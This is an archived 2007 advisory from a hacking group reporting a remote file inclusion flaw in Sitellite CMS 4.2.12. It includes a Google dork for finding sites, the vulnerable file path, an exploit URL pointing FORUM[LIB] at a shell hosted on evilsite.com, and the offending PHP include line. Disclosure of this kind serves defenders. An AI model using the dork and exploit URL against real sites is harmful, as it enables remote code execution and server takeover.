Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17281
HistoryJun 18, 2007 - 12:00 a.m.

Sitellite cms <= 4.2.12 RFI Vuln

2007-06-1800:00:00
vulners.com
32

############################################################

Link: http://www.sitelliteforge.com/index/siteforge-download-action/proj.sitellite?dl=sitellite-4.2.12-stable.tar.gz

version 4.2.12

Dork : "Powered by Sitellite"

FOUND BY : CarcaBot

[email protected]

Website: http://www.sitellite.org/

DOWNLOAD : http://www.sitelliteforge.com/index/siteforge-app/proj.sitellite

REMOTE FILE ICLUDE

############################################################

FILE :

PATH\saf\lib\PEAR\PhpDocumentor\Documentation\tests\bug-559668.php

############################################################

EXP:

site.com\path\saf\lib\PEAR\PhpDocumentor\Documentation\tests\559668.php?FORUM[LIB]=http://evilsite.com/yourshell.txt?

############################################################

CODE: on line 4

<?php

/** @package tests */

/** include tests */

require_once $FORUM['LIB'] . '/classes/db/PearDb.php';

require PEAR . 'test' . 'me';

include('file.ext');

include 'file.ext';

include(PEAR . 'test' . 'me');

?>

############################################################

http://Hacking.CarcaBot.ro - Romanian Electronic Network Security Lab Team !

[email protected] - [email protected]

Thanks to RENSLT Crew

############################################################

PhpDocumentor directory is .htaccess'ed